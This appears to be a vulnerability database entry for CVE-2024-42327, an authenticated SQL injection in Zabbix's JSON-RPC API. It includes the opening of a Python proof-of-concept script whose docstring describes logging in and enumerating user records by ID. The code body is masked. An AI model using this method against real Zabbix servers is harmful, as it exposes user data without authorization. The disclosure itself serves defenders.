Zabbix Authenticated SQL Injection Vulnerability (CVE-2024-42327)

Basic fields

Vulnerability ID:
SSV-99902
Disclosure/discovery date:
Unknown
Submission date:
2024-12-03
Severity:
Vulnerability category:
SQL injection
Affected component:
Zabbix
(multiple versions affected)
Vulnerability author:
Unknown
Submitter:
Knownsec
CVE-ID:
CVE-2024-42327
CNNVD-ID:
Not provided
CNVD-ID:
Not provided
ZoomEye Dork:
Not provided

Source

Vulnerability details

Not yet available

PoC (not a pocsuite plugin)

Contributor: Knownsec
import requests
import argparse

"""
Exploit Script for CVE-2024-42327
Author: Alejandro Ramos (@aramosf)
Assisted by: ChatGPT
Date: 2024-12-01

This script demonstrates the exploitation of the vulnerability CVE-2024-42327,
registered by Zabbix as ZBX-25623. This vulnerability allows unauthorized
access to sensitive user information by abusing the JSON-RPC API.

References:
- CVE: CVE-2024-42327
- Zabbix Issue Tracker: https://support.zabbix.com/browse/ZBX-25623

Functionality:
1. Logs in to the Zabbix JSON-RPC API to obtain a session token using a valid username and password.
2. Iterates over a range of user IDs (1 to 40), fetching user details for each ID.

Arguments:
- `-u` or `--url`: The API endpoint URL (e.g., http://192.168.201.128/api_jsonrpc.php).
- `-n` or `--username`: The username for authentication.
- `-p` or `--password`: The password for authentication.

Example:
python script.py -u "http://192.168.201.128/api_jsonrpc.php" -n "aramosf" -p "Hola1234"

Disclaimer:
This script is provided for educational purposes only. Unauthorized exploitation
of vulnerabilities is illegal and unethical. Use responsibly.
"""


def main(url, username, password):
    # First request: Login to get the session token
    headers = {
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


References

Solutions

Temporary workaround

No temporary workaround available

Official fix

No official fix available

Protection measures

No protection measures available

